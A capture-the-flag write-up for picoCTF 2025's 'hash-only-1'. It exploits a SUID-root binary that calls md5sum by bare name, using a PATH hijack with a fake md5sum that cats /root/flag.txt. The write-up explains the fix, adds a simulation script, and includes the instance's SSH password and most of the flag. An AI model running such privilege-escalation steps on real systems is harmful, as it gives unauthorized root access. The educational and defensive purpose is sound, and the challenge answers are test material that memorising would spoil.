hash-only-1 picoCTF 2025 Solution

Published: April 2, 2025

Description

The flaghasher binary runs with elevated privileges but only prints md5sum /root/flag.txt. Hijack the PATH so md5sum points to your own script that cats the flag.

SSH to shape-facility.picoctf.net -p 51426 (password 8d076785).

Confirm flaghasher is SUID-root and pull its strings to see what it shells out to.

Build a fake md5sum in your home directory and put . first in PATH so it wins the lookup.

```bash
ssh -p 51426 ctf-player@shape-facility.picoctf.net
```

On the target:

```bash
ls -la flaghasher
strings flaghasher | grep -E 'md5sum|/bin/'
echo '/bin/cat /root/flag.txt' > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher
```
PATH hijacking is the bread-and-butter of SUID privilege escalation; the Linux CLI for CTF guide covers strings, PATH, and SUID enumeration in depth.
  1. Step 1: Discover the helper call
    strings flaghasher produces hundreds of lines, so pipe straight into grep rather than scrolling. The hit is /bin/bash -c 'md5sum /root/flag.txt'. The bare md5sum (no leading /) means the child bash resolves it by walking PATH, so whoever controls PATH controls which md5sum runs.
    ```bash
    strings flaghasher | grep md5sum
    # Output: /bin/bash -c 'md5sum /root/flag.txt'
    ```

    PATH injection (also called PATH hijacking) exploits the fact that a shell (or a libc function such as execvp) resolves a bare command name by searching the directories listed in the PATH environment variable from left to right. When a program invokes a command by name without an absolute path (md5sum rather than /usr/bin/md5sum), the first executable named md5sum found along PATH is the one that runs.

    The strings command is a first-line static analysis tool. Run on any SUID binary, it quickly reveals hardcoded paths, the names of imported library functions such as system or execve, and, as here, the exact shell command being executed. When that command uses an unqualified binary name (no leading /), PATH injection becomes viable. Real-world SUID binaries in many Linux distributions have historically been vulnerable this way.

    SUID (Set User ID) bits make a binary run with the effective user ID of its owner rather than that of whoever executes it. A SUID binary owned by root therefore runs with root's effective UID regardless of which user launches it, which makes SUID binaries high-value targets for privilege escalation: any vulnerability in one potentially grants root access. Modern systems minimize the number of SUID binaries and use file capabilities or sudo policies instead.

  2. Step 2: Drop in a fake md5sum
    Write a one-line md5sum that cats the flag, chmod +x it, prepend . to PATH, and verify PATH order before running flaghasher. Critically, the fake script must not invoke the bare name md5sum: that name resolves through the hijacked PATH back to your own script and loops forever. An absolute path such as /usr/bin/md5sum bypasses PATH and is safe to call if you ever need the real tool. The one-liner has no shebang, which only works because bash, when exec fails with ENOEXEC, falls back to running the file as a shell script; adding #!/bin/sh costs nothing. If you SSH out and back in, PATH resets, so re-export it. One caveat worth knowing: bash resets a mismatched effective UID to the real UID unless started with -p, so a SUID program that relies on its effective UID alone when shelling out would run your script as ctf-player, which cannot read /root/flag.txt. The flag does come back here, so flaghasher evidently makes both IDs root before it invokes the shell.
    ```bash
    echo '/bin/cat /root/flag.txt' > md5sum
    chmod +x md5sum
    export PATH=.:$PATH
    echo $PATH | tr ':' '\n' | head -3   # verify '.' is first
    ./flaghasher
    ```

    Prepending . (the current directory) to PATH is a classic privilege escalation technique. The current directory is never in PATH by default on modern Linux systems specifically because of this attack - if it were, any malicious executable in the current directory would shadow system commands. However, PATH can be freely modified in a shell session, so an attacker who controls PATH can plant fake commands anywhere in the search order.

    The fake md5sum script is an instance of search-path hijacking: shadowing a legitimate system utility with a malicious one of the same name. In real penetration testing the same technique is used to establish persistence (shadowing scripts that cron invokes by relative name), escalate privileges (shadowing commands called by SUID binaries or by root's own scripts), or intercept sensitive data (shadowing commands like ssh that handle credentials).

    The correct fix is for flaghasher to invoke /usr/bin/md5sum by absolute path rather than the bare name, and to reset PATH (or the whole environment) to a known-good value before calling any external command; better still, avoid system() and a shell altogether and call execve with an explicit path and a fixed argument vector. POSIX specifies the left-to-right PATH search that makes the attack possible. The weakness is catalogued as CWE-426 (Untrusted Search Path) and CWE-427 (Uncontrolled Search Path Element); CWE-78 (OS Command Injection) is the related but different case of attacker data reaching the command string itself. The CERT C Secure Coding Standard covers it under ENV03-C (sanitize the environment when invoking external programs) and ENV33-C (do not call system()).
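The whole chain, as an added example that is not part of the original writeup or of picoCTF's challenge code: a small shell script that simulates flaghasher's call in a scratch directory with a constructed flag file (no root or SUID bit involved), plants the fake md5sum, shows what the bare name resolves to once . leads PATH, and runs the hijack against both the vulnerable command and a hardened variant that uses an absolute path and a reset PATH. The function and file names (vulnerable_hasher, hardened_hasher, WORK, FLAG_FILE) are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not the writeup's or picoCTF's code): simulate flaghasher's
# call chain in a scratch directory so the PATH hijack can be studied without
# root or a SUID bit. The flag file and all names here are constructed.
set -u

WORK="$(mktemp -d "$PWD/hijack-demo.XXXXXX")"   # under $PWD, not /tmp, in case /tmp is mounted noexec
trap 'rm -rf "$WORK"' EXIT
FLAG_FILE="$WORK/flag.txt"                       # stands in for /root/flag.txt
printf '%s\n' 'picoCTF{constructed_sample_flag}' > "$FLAG_FILE"

# Resolve the real tool once, while PATH is still clean. A real fix would
# simply hardcode the absolute path (/usr/bin/md5sum on most distributions).
REAL_MD5SUM="$(command -v md5sum)"

# Stand-in for flaghasher: the shell command strings revealed, with the
# bare name "md5sum" that the child bash resolves by walking PATH.
vulnerable_hasher() {
    /bin/bash -c "md5sum '$1'"
}

# Hardened stand-in: absolute path to the tool and PATH reset to a trusted
# list, so nothing the caller planted in PATH is reachable.
hardened_hasher() {
    PATH=/usr/bin:/bin /bin/bash -c "'$REAL_MD5SUM' '$1'"
}

# The fake md5sum from the writeup, given a shebang. It ignores its argument
# and prints the flag. It never invokes the bare name md5sum, which would
# resolve back to this script under the hijacked PATH and loop forever.
make_fake_md5sum() {
    printf '#!/bin/sh\n/bin/cat "%s"\n' "$FLAG_FILE" > "$WORK/md5sum"
    chmod +x "$WORK/md5sum"
}

# Run a hasher the way the writeup runs flaghasher: from the directory that
# holds the fake, with "." first in PATH. Prints whatever the hasher printed.
run_hijacked() {
    make_fake_md5sum
    ( cd "$WORK" && export PATH=".:$PATH" && "$1" "$FLAG_FILE" )
}

# The pre-flight check: what does the bare name resolve to once "." leads PATH?
resolve_hijacked() {
    make_fake_md5sum
    ( cd "$WORK" && export PATH=".:$PATH" && command -v md5sum )
}

hijack_output()   { run_hijacked vulnerable_hasher; }   # prints the flag, not a hash
hardened_output() { run_hijacked hardened_hasher; }     # prints a genuine md5sum line

echo "md5sum resolves to:     $(resolve_hijacked)"
echo "vulnerable flaghasher:  $(hijack_output)"
echo "hardened flaghasher:    $(hardened_output)"
```

Run it as a script. The vulnerable stand-in prints the flag because the child bash picks up ./md5sum; the hardened stand-in prints a real md5sum line even though the caller's PATH still starts with ., which is exactly the behaviour the fix paragraph asks for. Note that the hijack is confined to a subshell, so the parent script's PATH is untouched afterwards.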

Flag

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_bfa4...}

Classic PATH hijacking, so always check PATH order when privileged scripts invoke system tools.
